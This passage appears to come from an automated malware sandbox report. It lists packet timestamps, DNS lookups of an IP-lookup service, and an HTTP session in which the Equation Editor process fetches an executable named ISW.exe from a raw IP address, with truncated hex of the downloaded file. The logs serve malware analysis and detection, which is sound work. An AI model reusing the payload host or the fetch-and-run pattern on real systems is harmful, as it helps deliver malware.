May 2, 2024 17:39:46.784749985 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.784754038 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.784778118 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.784821033 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.784821987 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.784884930 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.784898996 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.784924984 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.784926891 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.784969091 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.784986973 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785001993 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785041094 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785042048 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.785054922 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785093069 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.785116911 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785135031 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785157919 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785177946 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.785202980 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785238981 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.785255909 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785290956 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785336018 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.785372019 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785446882 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785492897 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.785516977 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785553932 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785567045 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785578966 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785592079 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.785620928 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.785644054 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785656929 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785667896 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785691023 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.785715103 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785761118 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.785779953 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785794020 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785804987 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785834074 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.785860062 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785907984 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.785928011 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.785990953 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786036015 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786108971 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786122084 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786155939 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786164999 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786187887 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786201954 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786233902 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786267996 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786282063 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786314964 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786318064 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786329031 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786371946 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786374092 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786386967 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786410093 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786425114 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786441088 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786472082 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786487103 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786564112 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786576986 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786587954 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786600113 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786611080 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786617041 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786623955 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786634922 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786648035 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786657095 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786657095 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786688089 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786710024 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786722898 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786732912 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786770105 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786782980 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786799908 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786811113 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786834002 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786838055 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786865950 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786881924 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786916971 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786956072 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.786958933 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.786973000 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.787017107 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.787041903 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.787055016 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.787082911 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.787154913 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.787168026 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.787223101 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.787240028 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.787254095 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.787290096 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.874403954 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.874454975 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.874500036 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.874506950 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.874521971 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.874572039 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.874603033 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.874666929 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.874703884 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.874737978 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.874751091 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.874789000 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.874789000 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.874828100 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.874866009 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.874875069 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.874926090 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.874938965 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.874963045 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.874994040 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.875016928 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.875037909 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.875087976 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.875128031 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.875180960 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.875224113 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.875262022 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.875279903 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.875348091 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.875387907 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.875427008 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.875495911 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.875519991 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.875617027 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.875657082 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.875698090 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.875785112 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.875822067 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.875900030 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.875950098 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.875988007 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.876043081 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.876091957 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.876136065 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.876137018 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.876203060 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.876230001 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.876241922 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.876281977 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.876302958 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.876358986 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.876391888 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.876399040 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.876456022 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.876492977 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.876555920 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.876625061 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.876666069 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.876687050 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
                                        May 2, 2024 17:39:46.876709938 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876746893 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.876787901 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876835108 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876873970 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.876897097 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876971960 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877011061 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877046108 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877099991 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877141953 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877177954 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877286911 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877327919 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877408981 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877443075 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877484083 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877485037 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877554893 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877592087 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877592087 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877652884 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877693892 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877717972 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877758980 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877800941 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877806902 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877855062 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877890110 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877909899 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877975941 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878016949 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878026009 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878076077 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878115892 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878117085 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878189087 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878231049 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878240108 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878329039 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878366947 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878398895 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878467083 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878505945 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878510952 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878573895 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878611088 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878715992 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878779888 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878822088 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878822088 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878868103 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878907919 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878937006 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879023075 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879064083 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.879087925 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879239082 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879278898 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.879360914 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879451036 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879492044 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.879551888 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879626036 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879663944 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.879700899 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879714012 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879745007 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.879827023 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879898071 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879936934 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.879961014 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.880038977 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.880076885 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.880105972 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:47.079874039 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:47.265019894 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:48.817950010 CEST49162443192.168.2.22104.26.12.205
                                        May 2, 2024 17:39:48.817984104 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:48.818156958 CEST49162443192.168.2.22104.26.12.205
                                        May 2, 2024 17:39:48.822304010 CEST49162443192.168.2.22104.26.12.205
                                        May 2, 2024 17:39:48.822316885 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:49.008527994 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:49.008620977 CEST49162443192.168.2.22104.26.12.205
                                        May 2, 2024 17:39:49.015948057 CEST49162443192.168.2.22104.26.12.205
                                        May 2, 2024 17:39:49.015953064 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:49.016211033 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:49.099980116 CEST49162443192.168.2.22104.26.12.205
                                        May 2, 2024 17:39:49.140129089 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:49.290808916 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:49.290865898 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:49.290916920 CEST49162443192.168.2.22104.26.12.205
                                        May 2, 2024 17:39:49.301601887 CEST49162443192.168.2.22104.26.12.205
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 2, 2024 17:39:48.615206957 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
May 2, 2024 17:39:48.712471962 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
May 2, 2024 17:39:48.714919090 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
May 2, 2024 17:39:48.810549021 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 2, 2024 17:39:48.615206957 CEST | 192.168.2.22 | 8.8.8.8 | 0xf793 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
May 2, 2024 17:39:48.714919090 CEST | 192.168.2.22 | 8.8.8.8 | 0xf793 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 2, 2024 17:39:48.712471962 CEST | 8.8.8.8 | 192.168.2.22 | 0xf793 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:39:48.712471962 CEST | 8.8.8.8 | 192.168.2.22 | 0xf793 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:39:48.712471962 CEST | 8.8.8.8 | 192.168.2.22 | 0xf793 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:39:48.810549021 CEST | 8.8.8.8 | 192.168.2.22 | 0xf793 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:39:48.810549021 CEST | 8.8.8.8 | 192.168.2.22 | 0xf793 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:39:48.810549021 CEST | 8.8.8.8 | 192.168.2.22 | 0xf793 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                        • api.ipify.org
                                        • 23.94.54.101
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49161 | 23.94.54.101 | 80 | 2064 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 17:39:45.771538019 CEST | 69 | OUT | GET /ISW.exe HTTP/1.1
                                        Connection: Keep-Alive
                                        Host: 23.94.54.101
May 2, 2024 17:39:45.883047104 CEST | 1289 | IN | HTTP/1.1 200 OK
                                        Content-Type: application/octet-stream
                                        Last-Modified: Thu, 02 May 2024 19:48:58 GMT
                                        Accept-Ranges: bytes
                                        ETag: W/"57b5b9c5c99cda1:0"
                                        Server: Microsoft-IIS/8.5
                                        Date: Thu, 02 May 2024 15:39:45 GMT
                                        Content-Length: 1219072
                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7d 61 33 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 ea 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                        Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL}a3f"w@N@@@d|@.pu4@.text `.rdata@@.datalpH@.rsrc.@0@@.relocupv$@B [TRUNCATED]
May 2, 2024 17:39:45.883065939 CEST | 1289 | IN | Data Raw: 59 c3 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 f8 23 44 00 e8 72 f0 01 00 59 c3 e8 59 3c 00 00 68 fd 23 44 00 e8 61 f0 01 00 59 c3 51 e8 a9 00 00 00 68 02 24 44 00 e8 4f f0 01 00 59 c3 a1 30 14 4d 00 51 8b 40 04 05 30 14 4d 00 50 e8
                                        Data Ascii: Yh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3
